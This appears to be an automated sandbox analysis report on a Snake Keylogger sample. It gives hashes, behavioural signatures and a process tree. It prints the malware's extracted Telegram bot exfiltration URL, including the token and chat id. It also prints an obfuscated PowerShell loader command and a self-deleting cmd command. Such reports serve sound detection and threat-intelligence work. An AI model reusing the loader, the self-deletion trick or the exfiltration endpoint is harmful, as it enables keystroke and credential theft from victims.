Analysis
-
max time kernel
95s -
max time network
96s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-12-2024 06:21
Static task
static1
Behavioral task
behavioral1
Sample
5b23cfc94f6d1f5ecc2f38f0094ba78cf1496889d2d0f20453fec8cdebe6c2f1N.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
5b23cfc94f6d1f5ecc2f38f0094ba78cf1496889d2d0f20453fec8cdebe6c2f1N.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Tegnmaessig.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Tegnmaessig.ps1
Resource
win10v2004-20241007-en
General
-
Target
5b23cfc94f6d1f5ecc2f38f0094ba78cf1496889d2d0f20453fec8cdebe6c2f1N.exe
-
Size
1000KB
-
MD5
d91a875cc245f3f2ba13a97c427d5880
-
SHA1
39129185ab93c2ba972797c76434a59f950f4428
-
SHA256
5b23cfc94f6d1f5ecc2f38f0094ba78cf1496889d2d0f20453fec8cdebe6c2f1
-
SHA512
2a5dc3ee1c4c77248e50661c81df007b3c08c95a9648a37cf1abe53a4dd64a10d90d0a9cf50222d65773718f9e0255426ad8bab2da8c8c76b6a3e7bdbbb7e43c
-
SSDEEP
24576:2NluSo4pxUzQcRhTfu4VI6vxoX9FRd/1zVg/X7VwP+jwqjXInHXUF/GmEZet2gk8:2NluSo4pxUzQcRhTfu4VI6vxoX9FRdNY
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7557806283:AAFiqTWzN-gLgC-2y3c1Dz5CtqTp-HN6TYc/sendMessage?chat_id=7451270736
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
resource yara_rule behavioral2/memory/1140-198-0x00000000004A0000-0x00000000004C0000-memory.dmp family_snakekeylogger behavioral2/memory/1140-196-0x00000000004A0000-0x00000000016F4000-memory.dmp family_snakekeylogger -
Snakekeylogger family
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Rhynchocephala.exe -
Loads dropped DLL 1 IoCs
pid Process 1140 Rhynchocephala.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 22 drive.google.com 23 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 35 checkip.dyndns.org -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\mycetophilidae\Megalethoscope.ini 5b23cfc94f6d1f5ecc2f38f0094ba78cf1496889d2d0f20453fec8cdebe6c2f1N.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1140 Rhynchocephala.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2708 powershell.exe 1140 Rhynchocephala.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\opstalt.ini 5b23cfc94f6d1f5ecc2f38f0094ba78cf1496889d2d0f20453fec8cdebe6c2f1N.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\tekkkenerne.laa 5b23cfc94f6d1f5ecc2f38f0094ba78cf1496889d2d0f20453fec8cdebe6c2f1N.exe -
pid Process 2708 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5b23cfc94f6d1f5ecc2f38f0094ba78cf1496889d2d0f20453fec8cdebe6c2f1N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rhynchocephala.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral2/files/0x000c000000023b7b-183.dat nsis_installer_1 behavioral2/files/0x000c000000023b7b-183.dat nsis_installer_2 -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2708 powershell.exe 2708 powershell.exe 2708 powershell.exe 2708 powershell.exe 2708 powershell.exe 2708 powershell.exe 2708 powershell.exe 2708 powershell.exe 2708 powershell.exe 1140 Rhynchocephala.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2708 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2708 powershell.exe Token: SeIncreaseQuotaPrivilege 2708 powershell.exe Token: SeSecurityPrivilege 2708 powershell.exe Token: SeTakeOwnershipPrivilege 2708 powershell.exe Token: SeLoadDriverPrivilege 2708 powershell.exe Token: SeSystemProfilePrivilege 2708 powershell.exe Token: SeSystemtimePrivilege 2708 powershell.exe Token: SeProfSingleProcessPrivilege 2708 powershell.exe Token: SeIncBasePriorityPrivilege 2708 powershell.exe Token: SeCreatePagefilePrivilege 2708 powershell.exe Token: SeBackupPrivilege 2708 powershell.exe Token: SeRestorePrivilege 2708 powershell.exe Token: SeShutdownPrivilege 2708 powershell.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeSystemEnvironmentPrivilege 2708 powershell.exe Token: SeRemoteShutdownPrivilege 2708 powershell.exe Token: SeUndockPrivilege 2708 powershell.exe Token: SeManageVolumePrivilege 2708 powershell.exe Token: 33 2708 powershell.exe Token: 34 2708 powershell.exe Token: 35 2708 powershell.exe Token: 36 2708 powershell.exe Token: SeDebugPrivilege 1140 Rhynchocephala.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 2416 wrote to memory of 2708 2416 5b23cfc94f6d1f5ecc2f38f0094ba78cf1496889d2d0f20453fec8cdebe6c2f1N.exe 82 PID 2416 wrote to memory of 2708 2416 5b23cfc94f6d1f5ecc2f38f0094ba78cf1496889d2d0f20453fec8cdebe6c2f1N.exe 82 PID 2416 wrote to memory of 2708 2416 5b23cfc94f6d1f5ecc2f38f0094ba78cf1496889d2d0f20453fec8cdebe6c2f1N.exe 82 PID 2708 wrote to memory of 1140 2708 powershell.exe 91 PID 2708 wrote to memory of 1140 2708 powershell.exe 91 PID 2708 wrote to memory of 1140 2708 powershell.exe 91 PID 2708 wrote to memory of 1140 2708 powershell.exe 91 PID 1140 wrote to memory of 3040 1140 Rhynchocephala.exe 92 PID 1140 wrote to memory of 3040 1140 Rhynchocephala.exe 92 PID 1140 wrote to memory of 3040 1140 Rhynchocephala.exe 92 PID 3040 wrote to memory of 4616 3040 cmd.exe 94 PID 3040 wrote to memory of 4616 3040 cmd.exe 94 PID 3040 wrote to memory of 4616 3040 cmd.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\5b23cfc94f6d1f5ecc2f38f0094ba78cf1496889d2d0f20453fec8cdebe6c2f1N.exe"C:\Users\Admin\AppData\Local\Temp\5b23cfc94f6d1f5ecc2f38f0094ba78cf1496889d2d0f20453fec8cdebe6c2f1N.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle 1 "$Sammis=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\gangrenescent\stiltedness\Tegnmaessig.Peb';$edaphodont=$Sammis.SubString(57021,3);.$edaphodont($Sammis)2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Users\Admin\AppData\Local\Temp\Rhynchocephala.exe"C:\Users\Admin\AppData\Local\Temp\Rhynchocephala.exe"3⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Rhynchocephala.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵
- System Location Discovery: System Language Discovery
PID:4616
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
31B
MD581d8c2c8ad8f0fc0a7a2ab1adaab83dd
SHA19d039931626cf960391c728870c78477f3a05436
SHA256bd9d5e85a1c13119bad506a2523c665d363465506e17aab92407d43eceb5d509
SHA512cfef482bdd7b5a253ce68f61d5d69cb4fb96b8b8e5ff18355998aa8c9cda34f32431938a5bed76762ddc2b66413107976cd89ed82edfb40a06af2a9769d75f09
-
Filesize
1000KB
MD5d91a875cc245f3f2ba13a97c427d5880
SHA139129185ab93c2ba972797c76434a59f950f4428
SHA2565b23cfc94f6d1f5ecc2f38f0094ba78cf1496889d2d0f20453fec8cdebe6c2f1
SHA5122a5dc3ee1c4c77248e50661c81df007b3c08c95a9648a37cf1abe53a4dd64a10d90d0a9cf50222d65773718f9e0255426ad8bab2da8c8c76b6a3e7bdbbb7e43c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
55KB
MD5dbf1218b52e9c36ac61fd9588182d410
SHA1ca5b4f38b71cd9ca075b8c58d0841e56d8f49da8
SHA2568bebca4215d24a6f6ec02c135f9076a39d95ba3ae7a7487897021028ca219a68
SHA512fc50ae502ca65bed1884fd131bb89a7f5bb261079374101fe4d1d7ff1e03cffcf370c7cd7f096d65f92054164fbcc28d3e53e7f3b98c556f15fcd9f000f7e634
-
Filesize
210KB
MD55609a04c21f1f74196299475a805561a
SHA125d102b4fa08de2920ff5ee18db563721abf0c9d
SHA256a35dedc926c79cc9efba82b4fde9f2067149f107d5343864c02828bdd9dade88
SHA512ad1c9b3687e51b500cedc85f5c657ef94c8d372160e38ed516ccc44dd4697f6256dd5741a3dd04884d45ae573b46da2090ccc15db0478984b2711e937ba6e2b0